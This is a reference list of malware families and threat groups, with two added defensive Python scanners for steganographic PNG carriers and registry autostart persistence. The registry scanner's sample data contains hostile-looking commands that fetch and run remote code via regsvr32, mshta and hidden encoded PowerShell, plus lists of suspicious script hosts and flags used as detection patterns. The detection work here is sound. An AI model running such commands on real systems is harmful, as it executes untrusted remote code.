A backdoor trojan used by HIDDEN COBRA since at least 2013 to maintain a presence on, and further exploit, the networks of organizations in the government, financial, automotive, and media sectors.
A RAT used by HIDDEN COBRA since at least 2016 to exploit and maintain a presence on the networks of organizations within the aerospace, telecommunications, and finance industries.
Malware used alongside SunOrcal since at least late 2016. Researchers identified only ten unique samples, indicating limited use, across three variants that communicate with their C2 over either HTTP or raw TCP connections. The final payload is disguised as a Control Panel item (.cpl) file.
A banking trojan that conducts redirection attacks by installing a local proxy that sends users to cloned banking sites. It also conducts web injection attacks by injecting into browser processes and overlaying fake content on the legitimate page to steal users' financial data.
A trojan used by APT28 as first-stage malware to conduct reconnaissance on a network before a second-stage payload is dropped. It profiles the victim by collecting host information and is typically delivered as a malicious attachment to spearphishing emails.
A backdoor trojan used by the cyberespionage group REDBALDKNIGHT. The trojan allows threat actors to execute shell commands, download and upload data, take screenshots, and log keystrokes. It uses steganography to evade detection and retrieve a second-stage backdoor from its C2 server.
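The entry above does not say which steganographic technique the trojan uses to fetch its second stage. The simplest form of image-carried payload, and the one worth checking first during triage, is data appended after a PNG's IEND chunk: image viewers stop parsing at IEND, so anything after it is invisible to a casual look. The following is an added example written for this page, not code from the original or from any vendor's analysis of the REDBALDKNIGHT backdoor; it builds a minimal valid PNG in memory (constructed test input), walks the chunk structure, and reports any trailing bytes. The suspicious-indicator check (an `MZ` header) is an assumption about what an analyst would look for, not a statement about this malware's payload format.

```python
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack('>I', len(data)) + body + struct.pack('>I', zlib.crc32(body))


def make_png(width: int = 1, height: int = 1) -> bytes:
    """Build a minimal valid 8-bit RGB PNG (constructed sample, all-black pixels)."""
    ihdr = struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0)
    # Each scanline starts with filter byte 0, followed by width RGB triplets.
    raw = b''.join(b'\x00' + b'\x00\x00\x00' * width for _ in range(height))
    return PNG_SIG + _chunk(b'IHDR', ihdr) + _chunk(b'IDAT', zlib.compress(raw)) + _chunk(b'IEND', b'')


def walk_chunks(data: bytes):
    """Yield (chunk_type, end_offset) for each chunk up to and including IEND.

    Raises ValueError on non-PNG input, a truncated chunk, or a missing IEND,
    so a malformed carrier is reported rather than silently accepted.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError('not a PNG')
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        end = pos + 12 + length          # 4 length + 4 type + data + 4 CRC
        if end > len(data):
            raise ValueError('truncated chunk %r' % ctype)
        yield ctype, end
        pos = end
        if ctype == b'IEND':
            return
    raise ValueError('no IEND chunk')


def trailing_payload(data: bytes) -> bytes:
    """Return every byte after the IEND chunk (empty for a clean image)."""
    for ctype, end in walk_chunks(data):
        if ctype == b'IEND':
            return data[end:]
    return b''  # unreachable: walk_chunks raises if IEND is absent


def scan_image(data: bytes) -> dict:
    """Summarise the trailing region: size, and whether it starts like a PE file."""
    tail = trailing_payload(data)
    return {
        'trailing_bytes': len(tail),
        'pe_header': tail[:2] == b'MZ',   # assumed indicator, not specific to this malware
    }


if __name__ == '__main__':
    clean = make_png()
    stuffed = clean + b'MZ' + b'\x90' * 64   # constructed: fake PE-like blob appended
    print('clean  :', scan_image(clean))
    print('stuffed:', scan_image(stuffed))
```

A positive result here only tells you the image is a carrier; the second stage may still be encrypted or encoded, and a trojan that hides data inside pixel values rather than after IEND will pass this check, so treat it as the first filter, not the last.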
A trojan that rapidly takes repeated screenshots of a user's desktop and has been used to support threat actors in cyber-heists.
An infostealer trojan sold on an underground hacking forum since mid-July 2017 and operated through a PHP-based control panel. Buyers can rent FormBook for $29 per week, $59 per month, or $99 for three months, or purchase it outright for a one-time fee of $299.
A remote access trojan (RAT) that communicates with its C2 server via Gmail to evade detection.
A remote access trojan used by a China-linked APT group to target Vietnamese organizations. It can upload, download, search for, delete, modify, copy, and rename files, among other capabilities.
A banking trojan that borrows code from the Neutrino PoS malware and the NukeBot trojan. It mines the Monero cryptocurrency, injects code into web pages, and takes screenshots.
A backdoor trojan associated with the China-linked cyber espionage group DragonOK. It gives threat actors remote access to the targeted system and can log keystrokes, capture screenshots, and open a remote shell, among other capabilities.
A remote access trojan advertised for free on dark web forums as a trojan builder kit. Its author planted a backdoor module in the generated trojans that retrieves C2 information from a URL the author controls, giving the author control of every system infected by a Cobian trojan built with the kit.
A sophisticated backdoor trojan used by the Turla APT group as a second-stage backdoor. It avoids detection by securely wiping files and by changing strings and randomizing markers between backdoor versions, and it uses its own customized library for 3DES and RSA encryption.
A sophisticated backdoor trojan known for its use by the advanced persistent threat (APT) Turla, an alleged Russian government-associated espionage group.
A backdoor trojan used by the Turla APT group and written for the Microsoft .NET Framework, providing the threat actors with complete access to compromised devices and the ability to remotely load plugins for additional capabilities.
A backdoor trojan used by the Turla advanced persistent threat (APT) group as a first-stage backdoor to conduct reconnaissance.
A fully fileless trojan that likely reaches victims via malicious websites or a downloader and persists through an autostart registry entry rather than a file on disk. It mostly targets users in the Asia-Pacific region.
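Because a fileless trojan of this kind leaves no executable to scan, the place to look for it is the autostart registry entry itself: a Run or RunOnce value that launches a script host (PowerShell, mshta, regsvr32, wscript) with an encoded command, a hidden window, or a remote URL, rather than a normal program path. The following is an added example written for this page, not code from the original or from any analysis of this malware; it parses a constructed `.reg` export of the Run keys (the sample values are invented, with RFC 5737 documentation addresses) and flags entries that match those patterns. The specific flag list is an assumption about useful indicators, not a description of this trojan's exact command line.

```python
import re

# Constructed sample .reg export (already decoded from UTF-16). Two values are
# ordinary programs; three launch script hosts straight from the Run key, the
# pattern a fileless trojan uses to persist without a file of its own.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"COM+"="regsvr32 /s /n /u /i:http://198.51.100.7/p.sct scrobj.dll"
"Updater"="powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Svc"="mshta http://203.0.113.5/a.hta"
'''

AUTOSTART_KEYS = (
    r'\Software\Microsoft\Windows\CurrentVersion\Run',
    r'\Software\Microsoft\Windows\CurrentVersion\RunOnce',
)
# Interpreters that let a registry value carry the whole payload (assumed list).
SCRIPT_HOSTS = {'powershell', 'pwsh', 'mshta', 'wscript', 'cscript', 'regsvr32', 'rundll32', 'cmd'}
# Substrings that mark an encoded, hidden, or remote-loading command (assumed list).
SUSPICIOUS_FLAGS = ('-enc', '-w hidden', '-windowstyle hidden', 'frombase64string',
                    'javascript:', 'vbscript:', 'http://', 'https://')

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')


def unescape_reg_string(s: str) -> str:
    """Undo .reg escaping: \\\\ -> \\ and \\" -> " inside a quoted value."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def parse_reg_export(text: str) -> list:
    """Return (key, value_name, string_data) for every REG_SZ value in the export."""
    entries, key = [], None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group('key')
            continue
        m = VALUE_RE.match(line)
        if m and key and m.group('data').startswith('"'):   # skip dword:/hex: values
            data = m.group('data')[1:-1]                     # strip the outer quotes
            entries.append((key, unescape_reg_string(m.group('name')), unescape_reg_string(data)))
    return entries


def first_token(cmd: str) -> str:
    """Executable name (no path, no extension, lowercased) from a command line."""
    if cmd.startswith('"'):
        exe = cmd[1:cmd.find('"', 1)] if cmd.find('"', 1) > 0 else cmd[1:]
    else:
        exe = cmd.split(None, 1)[0] if cmd.strip() else ''
    exe = re.split(r'[\\/]', exe)[-1]
    return exe.rsplit('.', 1)[0].lower() if '.' in exe else exe.lower()


def scan_autostart(entries: list) -> list:
    """Flag autostart values that run a script host or carry suspicious flags."""
    findings = []
    for key, name, cmd in entries:
        if not any(key.lower().endswith(k.lower()) for k in AUTOSTART_KEYS):
            continue
        reasons = []
        host = first_token(cmd)
        if host in SCRIPT_HOSTS:
            reasons.append('script host: ' + host)
        lowered = cmd.lower()
        reasons += ['flag: ' + f for f in SUSPICIOUS_FLAGS if f in lowered]
        if reasons:
            findings.append({'key': key, 'name': name, 'command': cmd, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan_autostart(parse_reg_export(SAMPLE_REG)):
        print(f['key'], f['name'], f['reasons'])
```

On a live host you would feed this the output of `reg export` for each Run/RunOnce key (and the per-user hives), and extend the key list to the other autostart locations a fileless loader can use; the parser and scoring stay the same.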
Infy, later developed into Foudre, is an information-stealing trojan that uses a keylogger and clipboard capture to steal data from governments, businesses, and private citizens, mainly in Iran, the United States, and Iraq.
An advanced, modular trojan that infected victims undetected for about five years. Despite its capabilities, the operators appear to be financially motivated and use the malware to serve adware. Most victims are Russian-speaking users.